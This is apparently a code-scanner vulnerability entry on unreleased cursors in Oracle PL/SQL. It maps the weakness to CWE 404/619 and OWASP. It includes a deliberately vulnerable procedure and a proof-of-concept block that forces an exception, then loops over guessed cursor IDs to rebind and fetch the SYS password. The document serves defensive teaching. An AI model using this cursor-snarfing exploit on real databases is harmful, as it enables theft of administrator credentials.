The cursor can potentially be used by a lower-privileged user.
The cursor can potentially be used to access unauthorized information.
Resource leaks have at least two common causes:
- Error conditions and other exceptional circumstances.
- Confusion over which part of the program is responsible for releasing the resource.
In SQL, cursors have the privileges associated with the code that created them. If a less privileged user can capture the leaked cursor, it can be used to view unauthorized records.
In addition, most unreleased resource issues result in general software reliability problems, but if an attacker can intentionally trigger a resource leak, the attacker might be able to launch a denial of service by depleting the resource pool.
Example: The PWD_COMPARE
procedure can be used by code that does not have access to sys.dba_users
to check a user's password.
CREATE or REPLACE procedure PWD_COMPARE(p_user VARCHAR, p_pwd VARCHAR)
AUTHID DEFINED
IS
cursor INTEGER;
...
BEGIN
IF p_user != 'SYS' THEN
cursor := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(cursor, 'SELECT password FROM SYS.DBA_USERS WHERE username = :u', DBMS_SQL.NATIVE);
DBMS_SQL.BIND_VARIABLE(cursor, ':u', p_user);
...
END IF;
END PWD_COMPARE;
sys
password. One way to cause an exception is to pass an overly long argument to p_user
. Once the attacker knows that the cursor has leaked, they just have to guess the cursor and assign new bind variables.
DECLARE
x VARCHAR(32000);
i INTEGER;
j INTEGER;
r INTEGER;
pwd VARCHAR2(30);
BEGIN
FOR i IN 1..10000 LOOP
x:='b' || x;
END LOOP;
SYS.PWD_COMPARE(x,'pwd');
EXCEPTION WHEN OTHERs THEN
FOR j IN 1..10000
DBMS_SQL.BIND_VARIABLE(j, ':u', 'SYS');
DBMS_SQL.DEFINE_COLUMN(j, 1, pwd, 30);
r := DBMS_SQL.EXECUTE(j);
IF DBMS_SQL.FETCH_ROWS(j) > 0 THEN
DBMS_SQL.COLUMN_VALUE(j, 1, pwd);
EXIT;
END IF;
END LOOP;
...
END;
[1] Standards Mapping - OWASP Top 10 2004 - (OWASP 2004) A9 Application Denial of Service
[2] Standards Mapping - Security Technical Implementation Guide Version 3 - (STIG 3) APP6080 CAT II
[3] Standards Mapping - Common Weakness Enumeration - (CWE) CWE ID 404, CWE ID 619
[4] David Litchfield Dangling Cursor Snarfing: A New Class of Attack in Oracle
[5] Standards Mapping - Payment Card Industry Data Security Standard Version 1.1 - (PCI 1.1) Requirement 6.5.9
[6] Standards Mapping - SANS Top 25 2009 - (SANS 2009) Risky Resource Management - CWE ID 404